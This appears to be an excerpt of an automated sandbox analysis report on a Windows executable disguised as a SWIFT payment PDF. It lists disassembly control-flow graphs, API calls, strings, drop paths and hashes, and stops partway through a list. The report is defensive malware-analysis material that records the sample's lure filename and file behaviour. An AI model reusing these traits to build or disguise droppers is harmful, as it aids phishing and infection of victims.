                                                                                                                                    • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                                    • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                    • API String ID: 900638850-1230650788
                                                                                                                                    • Opcode ID: 815d4a1d12106e293d3587ab000579fb05f8572ec1ae3e21e1ffc4f2e4f9e7d3
                                                                                                                                    • Instruction ID: e2b9bd4c7d0941b93a588dc58e8d14d5200dcae9cd5da35c43f1ba43b89dddbc
                                                                                                                                    • Opcode Fuzzy Hash: 815d4a1d12106e293d3587ab000579fb05f8572ec1ae3e21e1ffc4f2e4f9e7d3
                                                                                                                                    • Instruction Fuzzy Hash: 79610371A00504EBDF20AF64CC40BAE37A5AF55324F16817FE942BA2D0D73D9AA1CB4D

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 562 405846-40586c call 405b11 565 405885-40588c 562->565 566 40586e-405880 DeleteFileW 562->566 568 40588e-405890 565->568 569 40589f-4058af call 406055 565->569 567 405a02-405a06 566->567 570 4059b0-4059b5 568->570 571 405896-405899 568->571 577 4058b1-4058bc lstrcatW 569->577 578 4058be-4058bf call 405a55 569->578 570->567 574 4059b7-4059ba 570->574 571->569 571->570 575 4059c4-4059cc call 406398 574->575 576 4059bc-4059c2 574->576 575->567 586 4059ce-4059e2 call 405a09 call 4057fe 575->586 576->567 580 4058c4-4058c8 577->580 578->580 582 4058d4-4058da lstrcatW 580->582 583 4058ca-4058d2 580->583 585 4058df-4058fb lstrlenW FindFirstFileW 582->585 583->582 583->585 587 405901-405909 585->587 588 4059a5-4059a9 585->588 602 4059e4-4059e7 586->602 603 4059fa-4059fd call 4051b4 586->603 590 405929-40593d call 406055 587->590 591 40590b-405913 587->591 588->570 593 4059ab 588->593 604 405954-40595f call 4057fe 590->604 605 40593f-405947 590->605 594 405915-40591d 591->594 595 405988-405998 FindNextFileW 591->595 593->570 594->590 598 40591f-405927 594->598 595->587 601 40599e-40599f FindClose 595->601 598->590 598->595 601->588 602->576 607 4059e9-4059f8 call 4051b4 call 405ef6 602->607 603->567 613 405980-405983 call 4051b4 604->613 614 405961-405964 604->614 605->595 608 405949-405952 call 405846 605->608 607->567 608->595 613->595 617 405966-405976 call 4051b4 call 405ef6 614->617 618 405978-40597e 614->618 617->595 618->595
                                                                                                                                    APIs
                                                                                                                                    • DeleteFileW.KERNELBASE(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SWIFT09181-24_pdf.exe"), ref: 0040586F
                                                                                                                                    • lstrcatW.KERNEL32(0042F270,\*.*,0042F270,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SWIFT09181-24_pdf.exe"), ref: 004058B7
                                                                                                                                    • lstrcatW.KERNEL32(?,0040A014,?,0042F270,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SWIFT09181-24_pdf.exe"), ref: 004058DA
                                                                                                                                    • lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SWIFT09181-24_pdf.exe"), ref: 004058E0
                                                                                                                                    • FindFirstFileW.KERNEL32(0042F270,?,?,?,0040A014,?,0042F270,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SWIFT09181-24_pdf.exe"), ref: 004058F0
                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,0040A300,0000002E), ref: 00405990
                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0040599F
                                                                                                                                    Strings
                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405853
                                                                                                                                    • \*.*, xrefs: 004058B1
                                                                                                                                    • "C:\Users\user\Desktop\SWIFT09181-24_pdf.exe", xrefs: 0040584F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2617234621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2617219411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617290785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617473125.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                    • String ID: "C:\Users\user\Desktop\SWIFT09181-24_pdf.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                                    • API String ID: 2035342205-3796717927
                                                                                                                                    • Opcode ID: 93e21722a180473d247efaee9d9481d6b8afddc4eaefe0f7bae919d4fb0dd793
                                                                                                                                    • Instruction ID: 3422579b2d55acfa562187ab3f611d485c5dde76635b84dd87a68d04928cc13f
                                                                                                                                    • Opcode Fuzzy Hash: 93e21722a180473d247efaee9d9481d6b8afddc4eaefe0f7bae919d4fb0dd793
                                                                                                                                    • Instruction Fuzzy Hash: 4541F270900A04EADF21AB618C89BBF7678EF41724F14823BF801B51D1D77C49859E6E
                                                                                                                                    APIs
                                                                                                                                    • CoCreateInstance.OLE32(004085A8,?,00000001,00408598,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402114
                                                                                                                                    Strings
                                                                                                                                    • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving, xrefs: 00402154
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2617234621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2617219411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617290785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617473125.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateInstance
                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving
                                                                                                                                    • API String ID: 542301482-2168965836
                                                                                                                                    • Opcode ID: 146cf55ee0b1f2e236d84f42d428f2d21f191b8343958f8e7f458ea2ed3a719d
                                                                                                                                    • Instruction ID: 1a24425b30559046e2e45c95ea19553466384e890d2313978d3609d0df4c75fa
                                                                                                                                    • Opcode Fuzzy Hash: 146cf55ee0b1f2e236d84f42d428f2d21f191b8343958f8e7f458ea2ed3a719d
                                                                                                                                    • Instruction Fuzzy Hash: 3E412C71A00208AFCF00DFA4CD88AAD7BB5FF48314B24457AF515EB2D1DBB99A41CB54
                                                                                                                                    APIs
                                                                                                                                    • FindFirstFileW.KERNELBASE(74DF3420,004302B8,0042FA70,00405B5A,0042FA70,0042FA70,00000000,0042FA70,0042FA70,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 004063A3
                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 004063AF
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2617234621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2617219411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617290785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617473125.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2295610775-0
                                                                                                                                    • Opcode ID: 26ecc7b94827cd81dbcd23612912991a36a9a8e6a086a5859bf6985d6c65a255
                                                                                                                                    • Instruction ID: 3b49439eae3a82ac9864466e1d27f896d1b9bc200308884f11696e1f8cd425af
                                                                                                                                    • Opcode Fuzzy Hash: 26ecc7b94827cd81dbcd23612912991a36a9a8e6a086a5859bf6985d6c65a255
                                                                                                                                    • Instruction Fuzzy Hash: 3AD012755081209BC28117386E0C84B7A5C9F193317115B36FE6BF22E0CB388C6786DC
                                                                                                                                    APIs
                                                                                                                                    • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040280A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2617234621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2617219411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617290785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617473125.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileFindFirst
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1974802433-0
                                                                                                                                    • Opcode ID: e4085221f00f99ea28b48dcf57fb83f2b364f19060254b57e6142408856da5b4
                                                                                                                                    • Instruction ID: 801a3ec73fa0f8c7b921e95059ce856047ace0635644dd2743fa1cdad283ab42
                                                                                                                                    • Opcode Fuzzy Hash: e4085221f00f99ea28b48dcf57fb83f2b364f19060254b57e6142408856da5b4
                                                                                                                                    • Instruction Fuzzy Hash: C5F08C71A005149BCB01EFA4DE49AAEB378FF04324F2045BBF105F31E1E7B89A409B29

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 257 403c41-403c53 258 403d94-403da3 257->258 259 403c59-403c5f 257->259 261 403df2-403e07 258->261 262 403da5-403ded GetDlgItem * 2 call 404119 SetClassLongW call 40140b 258->262 259->258 260 403c65-403c6e 259->260 265 403c70-403c7d SetWindowPos 260->265 266 403c83-403c86 260->266 263 403e47-403e4c call 404165 261->263 264 403e09-403e0c 261->264 262->261 276 403e51-403e6c 263->276 268 403e0e-403e19 call 401389 264->268 269 403e3f-403e41 264->269 265->266 271 403ca0-403ca6 266->271 272 403c88-403c9a ShowWindow 266->272 268->269 290 403e1b-403e3a SendMessageW 268->290 269->263 275 4040e6 269->275 277 403cc2-403cc5 271->277 278 403ca8-403cbd DestroyWindow 271->278 272->271 283 4040e8-4040ef 275->283 281 403e75-403e7b 276->281 282 403e6e-403e70 call 40140b 276->282 286 403cc7-403cd3 SetWindowLongW 277->286 287 403cd8-403cde 277->287 284 4040c3-4040c9 278->284 293 403e81-403e8c 281->293 294 4040a4-4040bd DestroyWindow EndDialog 281->294 282->281 284->275 291 4040cb-4040d1 284->291 286->283 288 403d81-403d8f call 404180 287->288 289 403ce4-403cf5 GetDlgItem 287->289 288->283 295 403d14-403d17 289->295 296 403cf7-403d0e SendMessageW IsWindowEnabled 289->296 290->283 291->275 298 4040d3-4040dc ShowWindow 291->298 293->294 299 403e92-403edf call 406077 call 404119 * 3 GetDlgItem 293->299 294->284 300 403d19-403d1a 295->300 301 403d1c-403d1f 295->301 296->275 296->295 298->275 327 403ee1-403ee6 299->327 328 403ee9-403f25 ShowWindow KiUserCallbackDispatcher call 40413b EnableWindow 299->328 304 403d4a-403d4f call 4040f2 300->304 305 403d21-403d27 301->305 306 403d2d-403d32 301->306 304->288 309 403d68-403d7b SendMessageW 305->309 310 403d29-403d2b 305->310 306->309 311 403d34-403d3a 306->311 309->288 310->304 315 403d51-403d5a call 40140b 311->315 316 403d3c-403d42 call 40140b 311->316 315->288 324 403d5c-403d66 315->324 325 403d48 316->325 324->325 325->304 327->328 331 403f27-403f28 328->331 332 403f2a 328->332 333 403f2c-403f5a GetSystemMenu EnableMenuItem SendMessageW 331->333 332->333 334 403f5c-403f6d SendMessageW 333->334 335 403f6f 333->335 336 403f75-403fb3 call 40414e call 406055 lstrlenW call 406077 SetWindowTextW call 401389 334->336 335->336 336->276 345 403fb9-403fbb 336->345 345->276 346 403fc1-403fc5 345->346 347 403fe4-403ff8 DestroyWindow 346->347 348 403fc7-403fcd 346->348 347->284 350 403ffe-40402b CreateDialogParamW 347->350 348->275 349 403fd3-403fd9 348->349 349->276 351 403fdf 349->351 350->284 352 404031-404088 call 404119 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 350->352 351->275 352->275 357 40408a-4040a2 ShowWindow call 404165 352->357 357->284
                                                                                                                                    APIs
                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C7D
                                                                                                                                    • ShowWindow.USER32(?), ref: 00403C9A
                                                                                                                                    • DestroyWindow.USER32 ref: 00403CAE
                                                                                                                                    • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CCA
                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 00403CEB
                                                                                                                                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CFF
                                                                                                                                    • IsWindowEnabled.USER32(00000000), ref: 00403D06
                                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 00403DB4
                                                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 00403DBE
                                                                                                                                    • SetClassLongW.USER32(?,000000F2,?), ref: 00403DD8
                                                                                                                                    • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E29
                                                                                                                                    • GetDlgItem.USER32(?,00000003), ref: 00403ECF
                                                                                                                                    • ShowWindow.USER32(00000000,?), ref: 00403EF0
                                                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F02
                                                                                                                                    • EnableWindow.USER32(?,?), ref: 00403F1D
                                                                                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F33
                                                                                                                                    • EnableMenuItem.USER32(00000000), ref: 00403F3A
                                                                                                                                    • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F52
                                                                                                                                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F65
                                                                                                                                    • lstrlenW.KERNEL32(0042D268,?,0042D268,00433F00), ref: 00403F8E
                                                                                                                                    • SetWindowTextW.USER32(?,0042D268), ref: 00403FA2
                                                                                                                                    • ShowWindow.USER32(?,0000000A), ref: 004040D6
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2617234621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2617219411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617290785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617473125.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3282139019-0
                                                                                                                                    • Opcode ID: 3899400ff8e588ca518489e250fd262a6eccf12b27110187e4fcf668c4fe1b6b
                                                                                                                                    • Instruction ID: ea0d75974b1de0ff06d17ebe4cf6f8c3df4269cbbec1c2e45b889e3be151f72f
                                                                                                                                    • Opcode Fuzzy Hash: 3899400ff8e588ca518489e250fd262a6eccf12b27110187e4fcf668c4fe1b6b
                                                                                                                                    • Instruction Fuzzy Hash: 51C1AEB1604300ABDB206F61ED85E2B7AA8EB94706F50053EF641B61F0CB7999529B2D

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 360 40389e-4038b6 call 40642b 363 4038b8-4038c3 GetUserDefaultUILanguage call 405f9c 360->363 364 4038ca-403901 call 405f22 360->364 367 4038c8 363->367 370 403903-403914 call 405f22 364->370 371 403919-40391f lstrcatW 364->371 369 403924-40394d call 403b74 call 405b11 367->369 377 403953-403958 369->377 378 4039df-4039e7 call 405b11 369->378 370->371 371->369 377->378 379 40395e-403986 call 405f22 377->379 384 4039f5-403a1a LoadImageW 378->384 385 4039e9-4039f0 call 406077 378->385 379->378 386 403988-40398c 379->386 388 403a9b-403aa3 call 40140b 384->388 389 403a1c-403a4c RegisterClassW 384->389 385->384 390 40399e-4039aa lstrlenW 386->390 391 40398e-40399b call 405a36 386->391 402 403aa5-403aa8 388->402 403 403aad-403ab8 call 403b74 388->403 392 403a52-403a96 SystemParametersInfoW CreateWindowExW 389->392 393 403b6a 389->393 397 4039d2-4039da call 405a09 call 406055 390->397 398 4039ac-4039ba lstrcmpiW 390->398 391->390 392->388 396 403b6c-403b73 393->396 397->378 398->397 401 4039bc-4039c6 GetFileAttributesW 398->401 405 4039c8-4039ca 401->405 406 4039cc-4039cd call 405a55 401->406 402->396 412 403b41-403b49 call 405287 403->412 413 403abe-403ad8 ShowWindow call 4063bf 403->413 405->397 405->406 406->397 420 403b63-403b65 call 40140b 412->420 421 403b4b-403b51 412->421 418 403ae4-403af6 GetClassInfoW 413->418 419 403ada-403adf call 4063bf 413->419 425 403af8-403b08 GetClassInfoW RegisterClassW 418->425 426 403b0e-403b31 DialogBoxParamW call 40140b 418->426 419->418 420->393 421->402 422 403b57-403b5e call 40140b 421->422 422->402 425->426 430 403b36-403b3f call 4037ee 426->430 430->396
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                                                                                                                      • Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                                                                                                                    • GetUserDefaultUILanguage.KERNELBASE(00000002,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\SWIFT09181-24_pdf.exe"), ref: 004038B8
                                                                                                                                      • Part of subcall function 00405F9C: wsprintfW.USER32 ref: 00405FA9
                                                                                                                                    • lstrcatW.KERNEL32(1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\SWIFT09181-24_pdf.exe"), ref: 0040391F
                                                                                                                                    • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,74DF3420), ref: 0040399F
                                                                                                                                    • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 004039B2
                                                                                                                                    • GetFileAttributesW.KERNEL32(Call), ref: 004039BD
                                                                                                                                    • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving), ref: 00403A06
                                                                                                                                    • RegisterClassW.USER32(00433EA0), ref: 00403A43
                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A5B
                                                                                                                                    • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A90
                                                                                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00403AC6
                                                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403AF2
                                                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403AFF
                                                                                                                                    • RegisterClassW.USER32(00433EA0), ref: 00403B08
                                                                                                                                    • DialogBoxParamW.USER32(?,00000000,00403C41,00000000), ref: 00403B27
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2617234621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2617219411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617290785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617473125.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                    • String ID: "C:\Users\user\Desktop\SWIFT09181-24_pdf.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                    • API String ID: 606308-3286580641
                                                                                                                                    • Opcode ID: 1b384d1f77ad73b90eb4ead2ce7446fbf64eb66176232e5d4eff2d39ff252f29
                                                                                                                                    • Instruction ID: 3415ad5ee5f1eed3d2c0e447cb4c4d8a0153f3b0974deb3f023f39c7f2583bdf
                                                                                                                                    • Opcode Fuzzy Hash: 1b384d1f77ad73b90eb4ead2ce7446fbf64eb66176232e5d4eff2d39ff252f29
                                                                                                                                    • Instruction Fuzzy Hash: A361CA706406006FD320AF66AD46F2B3A6CEB8474AF40553FF941B22E2DB7D5D41CA2D

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 433 402dee-402e3c GetTickCount GetModuleFileNameW call 405c2a 436 402e48-402e76 call 406055 call 405a55 call 406055 GetFileSize 433->436 437 402e3e-402e43 433->437 445 402f63-402f71 call 402d8a 436->445 446 402e7c 436->446 438 403020-403024 437->438 452 402f73-402f76 445->452 453 402fc6-402fcb 445->453 448 402e81-402e98 446->448 450 402e9a 448->450 451 402e9c-402ea5 call 403242 448->451 450->451 458 402eab-402eb2 451->458 459 402fcd-402fd5 call 402d8a 451->459 456 402f78-402f90 call 403258 call 403242 452->456 457 402f9a-402fc4 GlobalAlloc call 403258 call 403027 452->457 453->438 456->453 480 402f92-402f98 456->480 457->453 484 402fd7-402fe8 457->484 462 402eb4-402ec8 call 405be5 458->462 463 402f2e-402f32 458->463 459->453 471 402f3c-402f42 462->471 482 402eca-402ed1 462->482 470 402f34-402f3b call 402d8a 463->470 463->471 470->471 475 402f51-402f5b 471->475 476 402f44-402f4e call 4064dc 471->476 475->448 483 402f61 475->483 476->475 480->453 480->457 482->471 486 402ed3-402eda 482->486 483->445 487 402ff0-402ff5 484->487 488 402fea 484->488 486->471 489 402edc-402ee3 486->489 490 402ff6-402ffc 487->490 488->487 489->471 491 402ee5-402eec 489->491 490->490 492 402ffe-403019 SetFilePointer call 405be5 490->492 491->471 494 402eee-402f0e 491->494 495 40301e 492->495 494->453 496 402f14-402f18 494->496 495->438 497 402f20-402f28 496->497 498 402f1a-402f1e 496->498 497->471 499 402f2a-402f2c 497->499 498->483 498->497 499->471
                                                                                                                                    APIs
                                                                                                                                    • GetTickCount.KERNEL32 ref: 00402DFF
                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\SWIFT09181-24_pdf.exe,00000400,?,?,00000000,0040353A,?), ref: 00402E1B
                                                                                                                                      • Part of subcall function 00405C2A: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\SWIFT09181-24_pdf.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                                                      • Part of subcall function 00405C2A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SWIFT09181-24_pdf.exe,C:\Users\user\Desktop\SWIFT09181-24_pdf.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00402E67
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2617234621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2617219411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617290785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
